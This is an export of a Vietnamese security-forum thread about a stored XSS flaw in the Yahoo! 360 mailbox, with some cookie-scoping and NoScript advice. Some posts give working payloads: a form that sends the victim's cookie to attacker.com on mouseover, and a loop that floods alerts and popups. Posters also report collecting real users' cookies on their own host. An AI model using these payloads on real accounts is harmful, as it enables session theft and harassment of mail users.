<![CDATA[Latest posts for the topic "[Thảo luận] Bug MailBox của Yahoo! 360"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net [Thảo luận] Bug MailBox của Yahoo! 360
Số là blog đó bị ai chèn cái script vào Message. Mở ra thì gặp vậy. Hai anh em ngồi mò một chút cũng biết thêm được chút ít. Trong phần Message của Mailbox, mình có thể sử dụng script được. VD:
<script>alert("Hello. Tui la Bigball")</script> 
và cũng có thể steal cookies của victim được. Xin anh em cho ý kiến về bug này và theo mọi người thì cái này có thể exploit thêm được gì từ đây nữa không? Cảm ơn anh em đã xem. Bigball.]]> /hvaonline/posts/list/17916.html#107599 /hvaonline/posts/list/17916.html#107599 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 Bigball post cái này lên, lỗi này em nhận được từ một câu hỏi trên mạng thôi, nên em nghĩ việc cho phép sử dụng thẻ <script> trong message của Y360 có thể gây nguy hiểm. Còn khả năng hạn chế nên chỉ dám ngồi nghe :D]]> /hvaonline/posts/list/17916.html#107600 /hvaonline/posts/list/17916.html#107600 GMT Re:[Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#107659 /hvaonline/posts/list/17916.html#107659 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 http://message.360.yahoo.com, thì cookie này thể lợi dụng để làm giả cookie của victim tại http://mail.yahoo.com ko?? tại sao? Tổng quát thì thế nào ?? 2. giả sử tui là một nhà cung cấp free hosting, mỗi member khi đăng kí thì URL có dạng http://freehost.xxx/~user1/ http://freehost.xxx/~user2/ thằng user2 nó có 1 cái forum -->url có dạng http://freehost.xxx/~user2/forum (và giả sử forum này ko hề bị lỗi xss) thì thằng user1 muốn chôm cookie của thằng user2 có được ko ?? nếu có thì bằng cách nào?? Thằng admin gamma95 có cái forum để cho khách hàng ý kiến, thì thằng admin gamma95 nên để forum dưới dạng http://freehost.xxx/forum hay là http://forum.freehost.xxx tại sao? ps: lỗi này bác nào tìm ra vậy ?]]> /hvaonline/posts/list/17916.html#107738 /hvaonline/posts/list/17916.html#107738 GMT Re:[Thảo luận] Bug MailBox của Yahoo! 360

gamma95 wrote:
2 bác Bigball+nlfb cho mình thắc mắc 1 tí về XSS 1. giả sử mình chôm đc cookie khi victim ghé thăm cái link XSS http://message.360.yahoo.com, thì cookie này thể lợi dụng để làm giả cookie của victim tại http://mail.yahoo.com ko?? tại sao? Tổng quát thì thế nào ?? 2. giả sử tui là một nhà cung cấp free hosting, mỗi member khi đăng kí thì URL có dạng http://freehost.xxx/~user1/ http://freehost.xxx/~user2/ thằng user2 nó có 1 cái forum -->url có dạng http://freehost.xxx/~user2/forum (và giả sử forum này ko hề bị lỗi xss) thì thằng user1 muốn chôm cookie của thằng user2 có được ko ?? nếu có thì bằng cách nào?? Thằng admin gamma95 có cái forum để cho khách hàng ý kiến, thì thằng admin gamma95 nên để forum dưới dạng http://freehost.xxx/forum hay là http://forum.freehost.xxx tại sao? ps: lỗi này bác nào tìm ra vậy ? 
Em không rành về mấy cái XSS này lắm nên em chỉ trả lời theo suy nghĩ của em thôi. Có sai các bác đừng cười mà giúp em sửa sai nhé ;) 1. Mình test thử thì dù lấy được cookie nhưng vẫn không fake được. Và nếu có thể fake để vào được message của đối phương đi chăng nữa thì chưa chắc là http://mail.yahoo.com có cùng cấu trúc cookie với http://message.360.com 2. 2.1/ Fourm dạng gì? Nếu forum đó dính XSS thì có thể lấy được. Hoặc có thể dụ victim vào 1 link nào đó có logger để chôm cookie 2.2/ Nếu bình thường thì để dạng nào cũng được cả. Nhưng trong trường hợp free host thì không thể nào có subdomain dạng http://forum.freehost.xxx cả. Trừ phi lúc đăng ký nó cho mình subdomain và subdomain http://forum.freehost.xxx. Khác nhau duy nhất là nếu chúng ta có thể wwwect http://forum.freehost.xxx sang một IP khác (host, server...) còn http://forum.xxx/forum là một folder trên host và muốn wwwect nó phải sử dụng script. Em xin hết. Các bác đừng cười em nhá. Có gì sai thì giúp em sửa với. ===== P.S: Anh NLFB đâu rồi? Không giúp em chạy mất rồi hả B-) ]]> /hvaonline/posts/list/17916.html#107858 /hvaonline/posts/list/17916.html#107858 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#107904 /hvaonline/posts/list/17916.html#107904 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 Code:
<form action="[b]http://attacker.com/save.asp[/b]" method="post" name="XSS">
<input type="hidden" name="cookie">
</form>
<img border="0" onmouseover="window.document.XSS.cookie.value = document.cookie; window.document.XSS.submit();" src="none.jpg">
Vậy là khi bạn nhận thư, và nếu bạn vô tình đưa con chuột qua bức ảnh gửi kèm thì cũng có nghĩa là bạn đã bị lấy mất cookie. Và với cookie lấy được, các hacker có thể dễ dàng login hòm thư của bạn mà không cần biết mật khẩu của bạn.Tuy nhiên sau này bug này đã được Yahoo FIX Cookies của VICTIM sẽ được khai thác như thế nào ?.Nó được mã hóa bằng cái gì ? Xin được hướng dẫn FIX bug này luôn (Giành cho ai là BLOGGER :D) Bạn cài Add On này cho Fire Fox: https://addons.mozilla.org/en-US/firefox/addon/1237 Và tắt Java Script đi là xong!


]]> /hvaonline/posts/list/17916.html#107906 /hvaonline/posts/list/17916.html#107906 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#107909 /hvaonline/posts/list/17916.html#107909 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#107914 /hvaonline/posts/list/17916.html#107914 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#107916 /hvaonline/posts/list/17916.html#107916 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

Ikut3 wrote:
Nó cũng tương tự như cái bây giờ đấy .Tại sao Mail của Blog lại kô nằm cùng với Mail chính nhỉ 
Hồi đó Yahoo fix gần hết các bug XSS, chỉ còn lại bug của bồ. Cho nên cái bug mới này, tớ thấy kì kì B-) ]]> /hvaonline/posts/list/17916.html#107921 /hvaonline/posts/list/17916.html#107921 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

gamma95 wrote:
@ikut3: blog360 của yahoo xài ajax mà cấm chạy javascript thì sao nhể? với lại cậu cấm javascript nhưng nó chơi VBscript thì sao ta ?? @Bigball: Vì cậu ko đọc kỹ câu hỏi nên 3 câu trả lời hoàn toàn .. không chính xác.  
Ngay từ đầu em cũng không nghĩ là mình đúng. Nhưng vì muốn nghe câu trả lời từ anh gamma95. Vậy anh hãy tự trả lời những câu hỏi của mình để em biết chỗ sai của mình. Thân. Bigball]]> /hvaonline/posts/list/17916.html#107924 /hvaonline/posts/list/17916.html#107924 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 Code:
<script>
for(i=1 ; i<1000 ; i++)
{
alert('Hãy Change Pass! Mật khẩu này đã bị iku3 xâm nhập  !');
window.open("http://360.yahoo.com/058113");
}
</script>
Hùm đúng là với đoạn COde này khi Disable JAVA đi thì kô còn tác dụng gì nữa :(]]> /hvaonline/posts/list/17916.html#107928 /hvaonline/posts/list/17916.html#107928 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#107932 /hvaonline/posts/list/17916.html#107932 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#107936 /hvaonline/posts/list/17916.html#107936 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 https://addons.mozilla.org/en-US/firefox/addon/722 Sau khi cài đặt restart lại FireFox. Sau đó khi vào Y!360 thì chọn như hình Thế là xong. Log In bình thường và bug trên không làm gì được bạn nữa. Sau khi check mailbox xong và không phát hiện gì khả nghi thì bạn có thể Allow yahoo lại. @gamma95: OK. Em đang suy nghĩ về câu hỏi của anh. Nhưng hơi khó so với đứa không rành XSS như em /:) Khi nào nghĩ ra em sẽ reply lại thật hoành tráng.]]> /hvaonline/posts/list/17916.html#107940 /hvaonline/posts/list/17916.html#107940 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#107949 /hvaonline/posts/list/17916.html#107949 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

meomeo_bebong wrote:
Thế cho em 1 câu ngoài lề nhé : với những ai dùng các trình duyệt khác như IE 7 ; IE 6 ; IE 5 ; Opera ; Nescape ..... thì chặn bug này kiểu gì ạ :-/ Điều kiện : k0 sửa cấu hình trình duyệt , k0 dùng thêm các addon , toolbar :D 
Đơn giản là khỏi làm gì hết vì bây giờ 02/01/08 cái bug này nãy giờ tôi "thử" coi sao mà chả có gì xảy ra. [Chẳng biết mình có gà mờ mà ghi trật tới tag script ko nữa...] @edit: Ok! check đi check lại vẫn hơi thất vọng vì dường như chỉ alert và prompt là chạy dc.... nhưng có một điều khá hay là có thể khai biến: var Giờ khuya quá rồi, đi ngủ đã mai mò mẫn tiếp coi còn thứ nào chơi dc ko ^^ Tuy nhiên cũng có trò hay để tỉnh tò với cô bạn rồi. var a = ..... alert('.....'+ a) lol trò con nít! Xin các bác cứ chê cười.]]> /hvaonline/posts/list/17916.html#107953 /hvaonline/posts/list/17916.html#107953 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 If you use cookies in your website, a cookie set from a subdomain cannot be read from the main domain and vice versa because of the security association feature tied to the domain which set it. This is also true for session cookies, where, if the user is logged in on the main site, and then moves to a subdomain, the subdomain site will not be able to access the same session cookie, and will assign a new session (hence forcing the user to login again). However, session persistence across subdomains can be maintained by implementing URL rewriting instead of session cookies.   và cái này
As explained earlier, cookies are not shared among subdomains or between the domain and the subdomain. In order to set cookies accessible by all subdomains, use the following techniques: 1. While writing the cookie, set the cookie domain to ".domain.ext" so that it applies to all subdomains. 2. If the cookie domain is set to ".domain.ext", it will not be accessible by a user who types in the address without the www before the domain (i.e. http://domain.ext). Therefore, wwwect all requests without www to http://www.domain.ext. There are some reported problems with the above approach. It is safe to set the default cookie with no domain specified and then set another one with domain as ".domain.ext". In this case there is no need for the wwwects. However, remember that session cookies are set by the web server software and you may not have control over how the cookie domain is set.  
đủ chưa nhỉ ;-) ]]> /hvaonline/posts/list/17916.html#107963 /hvaonline/posts/list/17916.html#107963 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

blueocean89 wrote:
anh nlfb này, hình như hiện giờ thì không còn tác dụng của tag <script> nữa, anh check lại thử coi.  
Thử rồi, kết quả là cookies tiếp tục bay về host của ku bigball #:S . Về cái trình chặn NoScript thì em đã dùng từ hồi huynh mrro giới thiệu ở VNSECON'07 roài, nhưng hiện tại dùng nhiều nhất đâu phải là FF mà là IE 6 không hà :D]]> /hvaonline/posts/list/17916.html#107965 /hvaonline/posts/list/17916.html#107965 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#107992 /hvaonline/posts/list/17916.html#107992 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

nlfb wrote:

blueocean89 wrote:
anh nlfb này, hình như hiện giờ thì không còn tác dụng của tag <script> nữa, anh check lại thử coi.  
Thử rồi, kết quả là cookies tiếp tục bay về host của ku bigball #:S .  
Các anh dùng một đoạn PHP tren host ? hay dùng Perl ?]]> /hvaonline/posts/list/17916.html#108022 /hvaonline/posts/list/17916.html#108022 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

blueocean89 wrote:

nlfb wrote:

blueocean89 wrote:
anh nlfb này, hình như hiện giờ thì không còn tác dụng của tag <script> nữa, anh check lại thử coi.  
Thử rồi, kết quả là cookies tiếp tục bay về host của ku bigball #:S .  
Các anh dùng một đoạn PHP tren host ? hay dùng Perl ? 
Mình dùng PHP @onlinehack: Thanks ;) ]]> /hvaonline/posts/list/17916.html#108027 /hvaonline/posts/list/17916.html#108027 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#108029 /hvaonline/posts/list/17916.html#108029 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#108044 /hvaonline/posts/list/17916.html#108044 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#108554 /hvaonline/posts/list/17916.html#108554 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

Huyxvn wrote:
Lỗi này đc cái nghịch cũng vui, chưa biết có khai thác đc j ko. Dám bào nếu gửi cái này cho ai thì người đó cả đời ko vào đc Inbox nữa (nếu ko biết chặn Script rồi del cái ms đó đi), dùng vòng lặp cho hiện ra hàng loạt alert cũng vui phết. Tiện thể quảng cáo mấy cái trang web. Rồi cũng có thể tăng Page View của blog mình bằng cách này 
Đúng là .. chán thật :roll: ]]> /hvaonline/posts/list/17916.html#108561 /hvaonline/posts/list/17916.html#108561 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#110174 /hvaonline/posts/list/17916.html#110174 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

chupichu wrote:
Gửi Ikut3: Bạn nên ghi rõ nguồn gốc 2 tấm hình nhé :) Vì tớ biết chắc đó ko phải của bạn. Nói thêm về cái "bug" này, nó chỉ là cái lỗi cho phép chạy script trên mail box có chứa đoạn lệnh "alert, prompt". Và qua cái "bug" này ko thể lấy được password, thậm chí là passhash 
Thế nếu thế này thì sao nhỉ : <script src='blah blah..."> </script> -:-) ]]> /hvaonline/posts/list/17916.html#110212 /hvaonline/posts/list/17916.html#110212 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

blueocean89 wrote:

chupichu wrote:
Gửi Ikut3: Bạn nên ghi rõ nguồn gốc 2 tấm hình nhé :) Vì tớ biết chắc đó ko phải của bạn. Nói thêm về cái "bug" này, nó chỉ là cái lỗi cho phép chạy script trên mail box có chứa đoạn lệnh "alert, prompt". Và qua cái "bug" này ko thể lấy được password, thậm chí là passhash 
Thế nếu thế này thì sao nhỉ : <script src='blah blah..."> </script> -:-) @edit: Có bác nào giúp khai thác chút thông tin từ mớ cookie nguội ngắt trên host em cái -:-) vẫn chưa làm dc gì cả ;-)]]> /hvaonline/posts/list/17916.html#110213 /hvaonline/posts/list/17916.html#110213 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#110214 /hvaonline/posts/list/17916.html#110214 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

gamma95 wrote:
2 bác Bigball+nlfb cho mình thắc mắc 1 tí về XSS 1. giả sử mình chôm đc cookie khi victim ghé thăm cái link XSS http://message.360.yahoo.com, thì cookie này thể lợi dụng để làm giả cookie của victim tại http://mail.yahoo.com ko?? tại sao? Tổng quát thì thế nào ?? 2. giả sử tui là một nhà cung cấp free hosting, mỗi member khi đăng kí thì URL có dạng http://freehost.xxx/~user1/ http://freehost.xxx/~user2/ thằng user2 nó có 1 cái forum -->url có dạng http://freehost.xxx/~user2/forum (và giả sử forum này ko hề bị lỗi xss) thì thằng user1 muốn chôm cookie của thằng user2 có được ko ?? nếu có thì bằng cách nào?? Thằng admin gamma95 có cái forum để cho khách hàng ý kiến, thì thằng admin gamma95 nên để forum dưới dạng http://freehost.xxx/forum hay là http://forum.freehost.xxx tại sao?  
Hỏi khó quá, không có ai trả lời được rồi. Nhờ Mod gamma95 đưa ra đáp án của 3 câu hỏi trên cho anh em học hỏi thêm.]]> /hvaonline/posts/list/17916.html#114773 /hvaonline/posts/list/17916.html#114773 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#116516 /hvaonline/posts/list/17916.html#116516 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#116859 /hvaonline/posts/list/17916.html#116859 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 opera]]> /hvaonline/posts/list/17916.html#117005 /hvaonline/posts/list/17916.html#117005 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 / thì có thể dùng cho /subdir . Tuy nhiên cookie được set ở /subdir không thể dùng cho /, tương tự cookie được set ở /subdir1 không thể dùng cho /subdir2 2. Cookie được set cho .domain.com có thể dùng cho tất của các subdomain. Nhưng Cookie được set cho domain.comsub1.domain.com không thể dùng sub2.domain.com ]]> /hvaonline/posts/list/17916.html#123625 /hvaonline/posts/list/17916.html#123625 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#123949 /hvaonline/posts/list/17916.html#123949 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

gamma95 wrote:
@chupichu: Mục đích của XSS đâu nhất thiết phải lấy cho được passhash đâu đồng chí ? 
Đúng vậy, XSS không nhất thiết phải dành cho việc chỉa passhash, còn nhiều cách khác để chơi với nó, ví dụ phishing, malware remote install .v.v. đều có thể mượn tay Yahoo XSS bug này ( để thêm phần dễ lừa người dùng ấy mà ) làm trò.]]> /hvaonline/posts/list/17916.html#123956 /hvaonline/posts/list/17916.html#123956 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 Đúng vậy, XSS không nhất thiết phải dành cho việc chỉa passhash, còn nhiều cách khác để chơi với nó, ví dụ phishing, malware remote install .v.v. đều có thể mượn tay Yahoo XSS bug này ( để thêm phần dễ lừa người dùng ấy mà ) làm trò. 
Em khoải nhất trò deface bằng XSS, vui dễ sợ :D]]> /hvaonline/posts/list/17916.html#123959 /hvaonline/posts/list/17916.html#123959 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#123962 /hvaonline/posts/list/17916.html#123962 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360

KuNghi wrote:
MẤY BÁC CHO EM HỎI LẤY ĐƯỢC COOKIES THÌ LÀM SAO SỬ DỤNG NÓ ... CRACK NÓ THẾ NÀO NHỈ ... LÀM SAO ĐĂNG NHẬP ĐƯỢC VỚI COOKIES ĐÓ & CRACK RA ĐƯỢC PASS HẢ MẤY BÁC ! 
Bug này chỉ để nghịch thôi! Việc đăng nhập vào yahoo được ghi vào rất nhiều cookie, nhưng sử dụng bug này chỉ lấy được một cookie y360 liên quan đến session còn các cookie quan trọng khác thì không lấy được do không nằm trong subdomain này. ]]> /hvaonline/posts/list/17916.html#123974 /hvaonline/posts/list/17916.html#123974 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#123980 /hvaonline/posts/list/17916.html#123980 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 không có tác dụng gì hết. Nhưng bạn có vô số trò có thể nghịch với bug xss này thay vì cứ mò mẫm với cookie. Bạn có thể tham khảo cuốn mà anh Gamma95 đã giới thiệu, mình đã đọc sơ qua và thấy "tiềm năng" của XSS là vô cùng nguy hại nếu vào tay người biết cách khai thác http://www.amazon.com/XSS-Attacks-Scripting-Exploits-Defense/dp/1597491543]]> /hvaonline/posts/list/17916.html#123983 /hvaonline/posts/list/17916.html#123983 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#124317 /hvaonline/posts/list/17916.html#124317 GMT Re: [Thảo luận] Bug MailBox của Yahoo! 360 /hvaonline/posts/list/17916.html#124374 /hvaonline/posts/list/17916.html#124374 GMT